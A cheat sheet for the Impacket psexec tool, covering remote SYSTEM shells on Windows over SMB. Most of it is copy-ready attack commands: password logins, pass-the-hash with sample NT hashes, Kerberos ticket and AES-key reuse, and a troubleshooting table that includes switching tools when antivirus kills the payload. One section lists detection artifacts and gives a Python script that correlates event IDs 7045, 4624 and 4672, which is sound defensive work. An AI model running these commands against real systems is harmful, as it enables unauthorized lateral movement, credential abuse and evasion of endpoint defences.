
Overview

impacket-psexec uploads an executable to the ADMIN$ share, creates a Windows service to run it, and returns a SYSTEM-level interactive shell over SMB (port 445). It is the noisiest of the Impacket exec tools but provides full interactive access.

Authentication Methods

| Method    | Flag        | Example                      |
|-----------|-------------|------------------------------|
| Password  | (default)   | domain/user:password@target  |
| NTLM hash | -hashes     | -hashes :NT_HASH             |
| Kerberos  | -k -no-pass | -k -no-pass -dc-ip DC_IP     |
| AES key   | -aesKey     | -aesKey AES256_KEY           |

Basic Usage — Interactive Shell

impacket-psexec domain.local/administrator:password@TARGET
Local admin (no domain):
impacket-psexec ./administrator:password@TARGET

Execute Specific Command

impacket-psexec domain.local/administrator:password@TARGET "whoami"
Run a PowerShell command:
impacket-psexec domain.local/administrator:password@TARGET "powershell -c Get-Process"

How It Works

  1. Authenticates to the target via SMB (port 445).
  2. Connects to the ADMIN$ share (C:\Windows).
  3. Uploads a service binary (RemComSvc) to ADMIN$.
  4. Creates a Windows service pointing to the uploaded binary via the Service Control Manager (SCM).
  5. Starts the service, which spawns cmd.exe as SYSTEM.
  6. Communicates I/O through named pipes over SMB.
  7. On exit, stops the service, deletes it, and removes the uploaded binary.

OPSEC Considerations

| Indicator        | Detail                                                                |
|------------------|-----------------------------------------------------------------------|
| Service creation | Creates RemComSvc service (event 7045)                                |
| Binary on disk   | Writes executable to C:\Windows                                       |
| Event logs       | Service install in System log, logon in Security log (4624 type 3)    |
| Detection        | Easily flagged by EDR/AV — binary is well-signatured                  |
| Noise level      | High — most detectable of the three exec tools                        |
Artifacts to expect:
  • System Event ID 7045 (new service installed)
  • Security Event ID 4624 (network logon type 3)
  • Security Event ID 4672 (special privileges assigned)
  • File creation under C:\Windows\
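The steps under "How It Works" and the artifacts listed above translate directly into a host-based correlation rule. The following Python script is an added example, not code from this page or from the Impacket project: it walks a small set of constructed Windows event records (the field names `host`, `id`, `logon_type`, `service_name`, `image_path` are an assumed, simplified schema, not the real Windows XML layout) and flags a 7045 service install whose service is named RemComSvc or whose binary sits directly under C:\Windows, raising severity when a type-3 network logon (4624) and a privilege assignment (4672) precede it on the same host within a short window.

```python
"""Correlate Windows event-log records for the psexec-style remote service pattern.

Added example with a constructed, simplified event schema; it is not Impacket code
and the sample records below are made up for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta
from ntpath import dirname  # Windows path semantics regardless of host OS

# Constructed sample events (not real logs). WS01 shows the full pattern,
# WS02 a benign service install, WS03 a suspicious install with no preceding logon.
SAMPLE_EVENTS = [
    {"host": "WS01", "log": "Security", "id": 4624, "time": "2024-01-01T10:00:00",
     "logon_type": 3, "user": "administrator", "src_ip": "10.10.10.200"},
    {"host": "WS01", "log": "Security", "id": 4672, "time": "2024-01-01T10:00:00",
     "user": "administrator"},
    {"host": "WS01", "log": "System", "id": 7045, "time": "2024-01-01T10:00:02",
     "service_name": "RemComSvc", "image_path": r"C:\Windows\RemComSvc.exe"},
    {"host": "WS02", "log": "System", "id": 7045, "time": "2024-01-01T11:00:00",
     "service_name": "Backup Agent", "image_path": r"C:\Program Files\Vendor\agent.exe"},
    {"host": "WS03", "log": "System", "id": 7045, "time": "2024-01-01T12:00:00",
     "service_name": "UpdateHelper", "image_path": r"C:\Windows\svc.exe"},
]


def parse_time(value):
    """Parse the ISO-8601 timestamp used by the constructed records."""
    return datetime.fromisoformat(value)


def service_install_reasons(event):
    """Return why a 7045 record matches the psexec pattern (empty list means benign)."""
    reasons = []
    if event.get("service_name", "").lower() == "remcomsvc":
        reasons.append("service name RemComSvc")
    # Binary dropped straight into C:\Windows (the ADMIN$ share root), not a subfolder.
    image_dir = dirname(event.get("image_path", "")).rstrip("\\").lower()
    if image_dir == r"c:\windows":
        reasons.append("binary written directly under C:\\Windows")
    return reasons


def detect_psexec(events, window=timedelta(seconds=60)):
    """Return one finding per suspicious 7045, enriched with related 4624/4672 events."""
    by_host = defaultdict(list)
    for event in events:
        by_host[event["host"]].append(event)

    findings = []
    for host, host_events in by_host.items():
        for event in host_events:
            if event["id"] != 7045:
                continue
            reasons = service_install_reasons(event)
            if not reasons:
                continue
            install_time = parse_time(event["time"])

            def within_window(other):
                return install_time - window <= parse_time(other["time"]) <= install_time

            logons = [e for e in host_events
                      if e["id"] == 4624 and e.get("logon_type") == 3 and within_window(e)]
            privileged = [e for e in host_events if e["id"] == 4672 and within_window(e)]

            severity = "medium"
            if logons:
                reasons.append("preceded by network logon (4624 type 3) from %s"
                               % logons[0].get("src_ip", "unknown"))
                severity = "high"
            if privileged:
                reasons.append("special privileges assigned (4672)")

            findings.append({"host": host, "time": event["time"],
                             "service": event["service_name"],
                             "severity": severity, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in detect_psexec(SAMPLE_EVENTS):
        print(finding["severity"].upper(), finding["host"], finding["service"],
              "; ".join(finding["reasons"]))
```

The rule deliberately keys on two independent traits (the RemComSvc name and a binary at the ADMIN$ root) so that renaming the service alone does not silence it, and it downgrades rather than drops a hit when the logon event is missing, since Security-log forwarding lags or gaps are common in practice.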

Pass-the-Hash

impacket-psexec -hashes :64f12cddaa88057e06a81b54e73b949b domain.local/administrator@TARGET
With both LM and NT hash:
impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:64f12cddaa88057e06a81b54e73b949b domain.local/administrator@TARGET

Kerberos Authentication

Requires a valid ccache file or keytab.
export KRB5CCNAME=/tmp/administrator.ccache
impacket-psexec -k -no-pass domain.local/administrator@TARGET_FQDN
With explicit DC IP:
impacket-psexec -k -no-pass -dc-ip 10.10.10.1 domain.local/administrator@TARGET_FQDN -target-ip 10.10.10.5
Using AES key directly:
impacket-psexec -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc domain.local/administrator@TARGET_FQDN -k -no-pass

Target Specific Port

impacket-psexec -port 4455 domain.local/administrator:password@TARGET

Common Errors and Fixes

| Error                              | Cause                                        | Fix                                  |
|------------------------------------|----------------------------------------------|--------------------------------------|
| STATUS_ACCESS_DENIED               | User lacks local admin or ADMIN$ access      | Verify local admin membership        |
| STATUS_SHARING_VIOLATION           | Previous RemComSvc binary not cleaned up     | Manually delete from C:\Windows      |
| ERROR_SERVICE_EXISTS               | Stale service from previous run              | sc.exe delete RemComSvc on target    |
| Connection refused                 | SMB port 445 blocked                         | Check firewall, try -port            |
| KDC_ERR_PREAUTH_FAILED             | Wrong password or expired ticket             | Verify creds, regenerate ccache      |
| SessionError: STATUS_LOGON_FAILURE | Incorrect credentials                        | Double-check password/hash           |
| Hangs after connection             | AV/EDR killed the uploaded binary            | Try wmiexec or smbexec instead       |

Quick Reference

# Interactive shell with password
impacket-psexec domain.local/user:pass@TARGET

# Interactive shell with hash (pass-the-hash)
impacket-psexec -hashes :NTHASH domain.local/user@TARGET

# Interactive shell with Kerberos
export KRB5CCNAME=/tmp/user.ccache
impacket-psexec -k -no-pass domain.local/user@TARGET_FQDN

# Run single command
impacket-psexec domain.local/user:pass@TARGET "ipconfig /all"

# Custom port
impacket-psexec -port 4455 domain.local/user:pass@TARGET

# With explicit DC for Kerberos
impacket-psexec -k -no-pass -dc-ip DC_IP domain.local/user@TARGET_FQDN